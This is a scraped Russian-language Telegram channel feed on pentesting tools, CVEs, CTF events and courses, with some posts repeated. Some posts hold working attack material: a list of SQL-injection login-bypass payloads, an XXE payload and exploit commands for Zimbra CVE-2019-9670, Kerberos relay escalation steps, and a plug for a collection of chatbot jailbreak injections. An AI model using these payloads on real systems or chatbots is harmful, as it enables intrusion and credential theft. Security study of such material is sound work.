Forwarded from Похек
CVE-2022-21587
Oracle E-Business Suite (EBS)
Status: Exploited in the Wild
CVE-2022-21587 может привести к неавторизованному удаленному выполнению кода. 16 января 2023 года компания Viettel Security опубликовала анализ этой проблемы, подробно описав первопричину и метод использования уязвимости для получения возможности выполнения кода через полезную нагрузку Perl. Эксплойт, основанный на методе анализа Viettel Security, был опубликован на GitHub "HMs" 6 февраля 2023 года. Oracle приписала "l1k3beef" в качестве первооткрывателя уязвимости.
Анализ показал, что во время эксплуатации также возможно использование полезной нагрузки на основе Java Server Page (JSP) для RCE.
P.S. POC
Oracle E-Business Suite (EBS)
Status: Exploited in the Wild
CVE-2022-21587 может привести к неавторизованному удаленному выполнению кода. 16 января 2023 года компания Viettel Security опубликовала анализ этой проблемы, подробно описав первопричину и метод использования уязвимости для получения возможности выполнения кода через полезную нагрузку Perl. Эксплойт, основанный на методе анализа Viettel Security, был опубликован на GitHub "HMs" 6 февраля 2023 года. Oracle приписала "l1k3beef" в качестве первооткрывателя уязвимости.
Анализ показал, что во время эксплуатации также возможно использование полезной нагрузки на основе Java Server Page (JSP) для RCE.
P.S. POC
SSTImap
Это программное обеспечение для тестирования на проникновение, которое может проверять веб-сайты на наличие уязвимостей Code Injection и Server-Side Template Injection и эксплуатировать их, предоставляя доступ к самой операционной системе.
Этот инструмент был разработан для использования в качестве интерактивного средства тестирования на проникновение для обнаружения и эксплуатации SSTI, что позволяет осуществлять более продвинутую эксплуатацию.
#tools
Github
NetRunner 👾
Это программное обеспечение для тестирования на проникновение, которое может проверять веб-сайты на наличие уязвимостей Code Injection и Server-Side Template Injection и эксплуатировать их, предоставляя доступ к самой операционной системе.
Этот инструмент был разработан для использования в качестве интерактивного средства тестирования на проникновение для обнаружения и эксплуатации SSTI, что позволяет осуществлять более продвинутую эксплуатацию.
#tools
Github
NetRunner 👾
👍6
This media is not supported in your browser
VIEW IN TELEGRAM
Как вы помните, у нас есть CTF команда RHTeam, так вот для них сделали стикеры, разбирайте 😎
🔥7
Настроение у меня сегодня поделать посты, и есть у меня одна безумная идейка, сделать сложный и длинный CTF, для больших городов.
Пока в список входит:
Москва
Питер
Новосибирск
Да, что бы решить CTF, нужно выйти на улицу) 😉
Напиши свой город в комментариях, если будет много комментариев с одного города, то и там организуем)
А ниже проголосуй, за или против, если наберется 200 за, то мы начнём делать ❤️
Пока в список входит:
Москва
Питер
Новосибирск
Да, что бы решить CTF, нужно выйти на улицу) 😉
Напиши свой город в комментариях, если будет много комментариев с одного города, то и там организуем)
А ниже проголосуй, за или против, если наберется 200 за, то мы начнём делать ❤️
❤🔥6🔥2
🔥2
ADRT
Инструмент, используемый сетевыми администраторами и аналитиками безопасности для извлечения информации из Active Directory, такой как: Пользователи, группы, администраторы, контроллеры домена, пароль Never Expire, все компьютеры, все серверы, GPO, последний вход в систему, отключенные пользователи, группы участников и инвентаризация.
#ActiveDirectory #Windows
Инструмент, используемый сетевыми администраторами и аналитиками безопасности для извлечения информации из Active Directory, такой как: Пользователи, группы, администраторы, контроллеры домена, пароль Never Expire, все компьютеры, все серверы, GPO, последний вход в систему, отключенные пользователи, группы участников и инвентаризация.
#ActiveDirectory #Windows
👍5❤1
https://vk.com/cyberhackerss приглашает студентов-спикеров и слушателей посетить встречу-конференцию «Networks and RadioHack Meet-up»!
🗓 Когда: 5 марта в 12:00
📍где: Арт-пространство Графит (Фудхолл Графит
Электродная ул., 2, стр. 32)
🎟 бесплатная проходка для всех спикеров и слушателей
👥 количество мест: 40
📌 регистрация: https://t.iss.one/kibhack_bot
«Networks and RadioHack Meet-up» - это первая встреча-конференция от КибХак, на которой мы послушаем доклады, пообщаемся и, конечно же, выпьем ̶п̶и̶в̶а̶ лимонада (или все-таки пива). А еще это первая для нас встреча, которая будет организована за пределами ВУЗа.
Мероприятие будет полезным и для тех, кто ищет единомышленников для создания проектов, разработок, исследований, и для новичков, только начавших исследовать радиохакинг. Предполагаемые темы докладов для спикеров:
• технология SDR, RFID
• сети
• радиопротоколы, реверс радиопротоколов
• системы контроля доступа
• аппаратное обеспечение и разработка открытого исходный кода для контроллеров от исследователей, экспертов и интересующихся с последующим открытым обсуждением вопросов.
Если ты хочешь выступить с докладом или просто провести время с пользой и послушать выступления — регистрируйся через бота по этой ссылке: https://t.iss.one/kibhack_bot.
Окончательный список тем и другие обновления ты найдешь в беседах митапа и в [club192769069|группе] в ВК.
🗓 Когда: 5 марта в 12:00
📍где: Арт-пространство Графит (Фудхолл Графит
Электродная ул., 2, стр. 32)
🎟 бесплатная проходка для всех спикеров и слушателей
👥 количество мест: 40
📌 регистрация: https://t.iss.one/kibhack_bot
«Networks and RadioHack Meet-up» - это первая встреча-конференция от КибХак, на которой мы послушаем доклады, пообщаемся и, конечно же, выпьем ̶п̶и̶в̶а̶ лимонада (или все-таки пива). А еще это первая для нас встреча, которая будет организована за пределами ВУЗа.
Мероприятие будет полезным и для тех, кто ищет единомышленников для создания проектов, разработок, исследований, и для новичков, только начавших исследовать радиохакинг. Предполагаемые темы докладов для спикеров:
• технология SDR, RFID
• сети
• радиопротоколы, реверс радиопротоколов
• системы контроля доступа
• аппаратное обеспечение и разработка открытого исходный кода для контроллеров от исследователей, экспертов и интересующихся с последующим открытым обсуждением вопросов.
Если ты хочешь выступить с докладом или просто провести время с пользой и послушать выступления — регистрируйся через бота по этой ссылке: https://t.iss.one/kibhack_bot.
Окончательный список тем и другие обновления ты найдешь в беседах митапа и в [club192769069|группе] в ВК.
ВКонтакте
КибХак
«КиберХакерс» или «КибХак»- студенческое сообщество РТУ МИРЭА (каф. КиИБ ИИИ ) по информационным технологиям и кибербезопасности. Наше сообщество объединяет школьников, студентов старших и младших курсов, преподавателей, специалистов работающих в сфере ИБ…
❤3
Forwarded from Похек
SQL injection auth bypass list
or 1=1#sqli
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
🔥15❤2😍2❤🔥1👍1
udon
Инструмент на Go для поиска поддоменов на основе Google Analytics ID
Установка:
Инструмент на Go для поиска поддоменов на основе Google Analytics ID
Установка:
go install github.com/dhn/udon@latest
Использование:udon -silent -json -s UA-ID | jq -c
#tools🔥7❤🔥1
💬🤖💉 Chatbot Injections & Exploits🐱💻
Добро пожаловать в репозиторий инъекций и эксплойтов ChatBot. Это репозиторий представляет собой коллекцию возможных инъекций и эксплойтов, позволяющих "обмануть" любой ChatBot и заставить его делать то, что он не должен делать. Это репозиторий находится в процессе работы и будет регулярно обновляться. Если у вас есть какие-либо предложения или вы хотите внести свой вклад, пожалуйста, не стесняйтесь открыть проблему или запрос на исправление.
#chatgpt
Добро пожаловать в репозиторий инъекций и эксплойтов ChatBot. Это репозиторий представляет собой коллекцию возможных инъекций и эксплойтов, позволяющих "обмануть" любой ChatBot и заставить его делать то, что он не должен делать. Это репозиторий находится в процессе работы и будет регулярно обновляться. Если у вас есть какие-либо предложения или вы хотите внести свой вклад, пожалуйста, не стесняйтесь открыть проблему или запрос на исправление.
#chatgpt
🔥4👍3
Forwarded from Похек
XXE to RCE Zimbra CVE-2019-9670
Всем привет! Проводя один из пентестов был найден Zimbra сервер. В ней была найдена очень интересная CVE-2019-9670. Если кратко, то это экплуатация XXE для получения RCE. Звучит интересно, да?)
Payload XXE:
Metasploit:
Все 3 сплойта отлично срабатывают, но есть пару нюансов.
Плохой нюанс кроется в Zaber. У него нет функции TLS verify skip, поэтому если будет кривой серт на сайте и только 443 открыт, то пользуйтесь Arambiz)
Хороший нюанс, даже если Arambiz не сможет достучаться до веб шела, то вы всё равно получите креды администратора. Поэтому постарайтесь найти логин форму и вы получите админку без веб шела.
Буду рад, если распространите этот материал!
Пользуйтесь на здоровье, но не думайте блечить 😉
Всем привет! Проводя один из пентестов был найден Zimbra сервер. В ней была найдена очень интересная CVE-2019-9670. Если кратко, то это экплуатация XXE для получения RCE. Звучит интересно, да?)
Payload XXE:
xxe [Ниже приведу парочку примеров, как эксплуатировать эту вулну.
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="https://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
Metasploit:
msf > use exploit/linux/http/zimbra_xxe_rceArambiz - эксплойт на Python3:
msf exploit(zimbra_xxe_rce) > show targets
...targets...
msf exploit(zimbra_xxe_rce) > set TARGET < target-id >
msf exploit(zimbra_xxe_rce) > show options
...show and set options...
msf exploit(zimbra_xxe_rce) > exploit
clone https://github.com/oppsec/arbimz.gitZaber - эксплойт на Go:
pip3 install -r requirements.txt
python3 main.py --url https://example.com/
install github.com/oppsec/zaber@latestЕсли у вас не находит бинарь, то пропишите абсолютный путь.
zaber -u https://example.com
-u https://example.comА после работ не забудьте добавить
$HOME/go/bin/ в свой PATH 😉Все 3 сплойта отлично срабатывают, но есть пару нюансов.
Плохой нюанс кроется в Zaber. У него нет функции TLS verify skip, поэтому если будет кривой серт на сайте и только 443 открыт, то пользуйтесь Arambiz)
Хороший нюанс, даже если Arambiz не сможет достучаться до веб шела, то вы всё равно получите креды администратора. Поэтому постарайтесь найти логин форму и вы получите админку без веб шела.
Буду рад, если распространите этот материал!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13
KrbRelayUp
Оболочка для
1. Создание нового аккаунта на локальной машине
2. Принудительная авторизация учетной записи на локальной машине
3.
5. Используя указанный
8. Генерирование нового
9. Использование полученного сертификата и
Оболочка для
Rubeus и KrbRelay для упрощения следующих атак:1. Создание нового аккаунта на локальной машине
2. Принудительная авторизация учетной записи на локальной машине
3.
Kerberos relay to LDAP
4. Добавление привилегий RBCD и получение Service Ticket (ST) на локальной машине5. Используя указанный
ST для аутентификации в локальном Service Manager и создания нового процесса, как NT/SYSTEM
6. Kerberos relay to ADCS (HTTP)
7. Генерирование запроса на сертификат от имени учетной записи локальной машины, отправка запроса в ADCS Web Enrollment для получения сертификата для учетной записи локальной машины.8. Генерирование нового
KeyCredential и добавление его к атрибуту msDS-KeyCredentialLink учетной записи локальной машины9. Использование полученного сертификата и
KeyCredential для получения TGT для учетной записи локальной машины через PKInit
10. Использование TGT для получения Service Ticket (ST) на локальной машине через S4U2Self и TGSSUB
#tools❤🔥10👍1
Forwarded from Похек
Foxit PDF Reader CVE-2022-28672 RCE: разбор уязвимости
В этой статье расскажу об уязвимости, обнаруженной при оценке безопасности популярных программ для чтения PDF. На этот раз была обнаружена уязвимость
#CVE #RCE #моястатья
В этой статье расскажу об уязвимости, обнаруженной при оценке безопасности популярных программ для чтения PDF. На этот раз была обнаружена уязвимость
use-after-free и несколько других багов в Foxit PDF Reader во время фаззинга. Мы смогли успешно использовать эту уязвимость для удаленного выполнения кода в Foxit PDF Reader.#CVE #RCE #моястатья
👍6🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
Holehe OSINT - Email to Registered Accounts
Эффективный поиск зарегистрированных учетных записей из электронных писем. Holehe проверяет, прикреплено ли письмо к аккаунту на таких сайтах, как twitter, instagram, imgur и более чем 120 других.
Установка:
#tools #osint
Эффективный поиск зарегистрированных учетных записей из электронных писем. Holehe проверяет, прикреплено ли письмо к аккаунту на таких сайтах, как twitter, instagram, imgur и более чем 120 других.
Установка:
pip3 install holehe
илиgit clone https://github.com/megadose/holehe.git
cd holehe/
python3 setup.py install
Holehe можно запускать из CLI и быстро встраивать в существующие python-приложения.#tools #osint
❤5👍1🔥1
А теперь серьезно ⛈
Пора выходить на новый уровень🔼
Мы меняем концепцию, углубляемся в репетиторство.
С сегодняшнего дня NetRunner начинает углублено сотрудничать с RESOLUTE ATTACK.
И мы рады заявить что их курс, после которого вы получите сертификат PRTT, на данный момент - ТОП 1 в России по пентесту.
Так как это очень серьезный курс и обычному Kiddie ("новокеку") будет очень сложно туда залететь , мы под руководством RA создаем подготовительный курс с необходимой БАЗОЙ !!!
Информации будет больше, чем мы давали ранее.
Это будет больше похоже на репетиторство, чем на обычный поточный курс.
У вас будет:
- новый ментор (и не один)
- структурированная база данных со всей нужной информацией
- занятия 2 раза в неделю
Вместе с RESOLUTE ATTACK мы взяли на себя полномочия популяризации pentest`а в СНГ и будем двигаться бок о бок.
Развивайся вместе с нами!
Пора выходить на новый уровень
Мы меняем концепцию, углубляемся в репетиторство.
С сегодняшнего дня NetRunner начинает углублено сотрудничать с RESOLUTE ATTACK.
И мы рады заявить что их курс, после которого вы получите сертификат PRTT, на данный момент - ТОП 1 в России по пентесту.
Так как это очень серьезный курс и обычному Kiddie ("новокеку") будет очень сложно туда залететь , мы под руководством RA создаем подготовительный курс с необходимой БАЗОЙ !!!
Информации будет больше, чем мы давали ранее.
Это будет больше похоже на репетиторство, чем на обычный поточный курс.
У вас будет:
- новый ментор (и не один)
- структурированная база данных со всей нужной информацией
- занятия 2 раза в неделю
Вместе с RESOLUTE ATTACK мы взяли на себя полномочия популяризации pentest`а в СНГ и будем двигаться бок о бок.
Развивайся вместе с нами!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥25❤🔥9👍9
webanalyze
Это порт Wappalyzer в Go. Этот инструмент разработан с учетом производительности и позволяет тестировать огромные списки хостов.
Установка:
Установочный файл с Github
Сбилдить:
Это порт Wappalyzer в Go. Этот инструмент разработан с учетом производительности и позволяет тестировать огромные списки хостов.
Установка:
Установочный файл с Github
Сбилдить:
go install -v github.com/rverton/webanalyze/cmd/webanalyze@latestИспользование webanalyze:
webanalyze -update
webanalyze -h
-apps stringDocker:
-crawl int
-host string
-hosts string
-output string
-search
-silent
-update
-worker int
git clone https://github.com/rverton/webanalyze.git
docker build -t webanalyze:latest webanalyze
docker run -it webanalyze:latest -h❤6👍2
Наш любимый учитель @fir3wall1 решил вести свой пентестерский блог ⛈
Не могу вам его не порекомендовать , там будет много годного контента для +- знающих ребят.
Залетайте
#не_реклама
Не могу вам его не порекомендовать , там будет много годного контента для +- знающих ребят.
Залетайте
#не_реклама
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍4😍4